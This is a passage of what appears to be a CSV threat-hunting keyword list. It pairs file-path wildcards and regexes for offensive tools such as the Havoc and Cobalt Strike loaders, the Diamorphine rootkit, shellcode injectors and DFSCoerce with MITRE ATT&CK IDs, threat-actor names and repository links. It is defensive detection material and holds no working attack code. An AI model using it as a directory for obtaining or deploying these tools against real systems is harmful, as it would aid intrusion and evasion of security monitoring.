Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*/demon.x64.bin*",".{0,1000}\/demon\.x64\.bin.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/demon.x64.exe*",".{0,1000}\/demon\.x64\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/demon1.dll*",".{0,1000}\/demon1\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/demosyscalls.exe*",".{0,1000}\/demosyscalls\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/Dendrobate.git*",".{0,1000}\/Dendrobate\.git.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation 
tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*/Dendron.bin*",".{0,1000}\/Dendron\.bin.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*/Dendron.csproj*",".{0,1000}\/Dendron\.csproj.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*/Dendron.exe*",".{0,1000}\/Dendron\.exe.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*/Dendron.sln*",".{0,1000}\/Dendron\.sln.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*/DeNiSe.git*",".{0,1000}\/DeNiSe\.git.{0,1000}","offensive_tool_keyword","DeNiSe","DeNiSe is a proof of concept for tunneling TCP over DNS in 
Python","T1071.004 - T1048.003","TA0011 - TA0010 - TA0001","N/A","N/A","C2","https://github.com/mdornseif/DeNiSe","1","1","N/A","10","10","22","10","2021-12-17T18:03:33Z","2010-01-15T07:43:14Z" "*/Dent/*/Loader/Loader.go*",".{0,1000}\/Dent\/.{0,1000}\/Loader\/Loader\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","1","N/A","10","10","294","50","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" "*/Dent/Dent.go*",".{0,1000}\/Dent\/Dent\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","1","N/A","10","10","294","50","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" "*/Dent/Loader*",".{0,1000}\/Dent\/Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/optiv/Dent","1","1","N/A","10","10","294","50","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" "*/DeployPrinterNightmare.exe*",".{0,1000}\/DeployPrinterNightmare\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/DesertFox/archive/*.zip*",".{0,1000}\/DesertFox\/archive\/.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","124","27","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "*/detail/kali-linux/*",".{0,1000}\/detail\/kali\-linux\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/detect_antivirus/*.js*",".{0,1000}\/detect_antivirus\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/detect_antivirus/*.rb*",".{0,1000}\/detect_antivirus\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/detect-hooks.c*",".{0,1000}\/detect\-hooks\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","147","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*/detect-hooks.cna*",".{0,1000}\/detect\-hooks\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","147","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*/detect-hooks.h*",".{0,1000}\/detect\-hooks\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - 
APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","147","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*/Detect-Hooks/*",".{0,1000}\/Detect\-Hooks\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","147","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*/DFSCoerce.git*",".{0,1000}\/DFSCoerce\.git.{0,1000}","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","687","90","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z" 
"*/dfscoerce.py*",".{0,1000}\/dfscoerce\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/dhcp-discover.nse*",".{0,1000}\/dhcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dhcpd-noroute.conf*",".{0,1000}\/dhcpd\-noroute\.conf.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*/Dialogs/Payload.hpp*",".{0,1000}\/Dialogs\/Payload\.hpp.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/Diamorphine.git*",".{0,1000}\/Diamorphine\.git.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - 
TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","1","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*/dicassassin.7z*",".{0,1000}\/dicassassin\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*/dicom-brute.nse*",".{0,1000}\/dicom\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dicom-ping.nse*",".{0,1000}\/dicom\-ping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dict-info.nse*",".{0,1000}\/dict\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dicts/ftp_default.txt*",".{0,1000}\/dicts\/ftp_default\.txt.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*/DigitalOceanProxyTab.java*",".{0,1000}\/DigitalOceanProxyTab\.java.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","N/A","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","1","N/A","10","1","43","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z" "*/DInjector.git*",".{0,1000}\/DInjector\.git.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","N/A","N/A","N/A" "*/DInvoke/*",".{0,1000}\/DInvoke\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - 
TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/DInvokeResolver/*",".{0,1000}\/DInvokeResolver\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/dir_brute.txt*",".{0,1000}\/dir_brute\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dirbuster*",".{0,1000}\/dirbuster.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/dirbuster.py*",".{0,1000}\/dirbuster\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/dirbuster/*",".{0,1000}\/dirbuster\/.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/DirCreate2System.git*",".{0,1000}\/DirCreate2System\.git.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*/DirCreate2System.git*",".{0,1000}\/DirCreate2System\.git.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*/direct_syscall_amd64.s*",".{0,1000}\/direct_syscall_amd64\.s.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","286","33","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*/dirsearch.py*",".{0,1000}\/dirsearch\.py.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","694","270","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*/Dirty-Pipe.sh*",".{0,1000}\/Dirty\-Pipe\.sh.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation 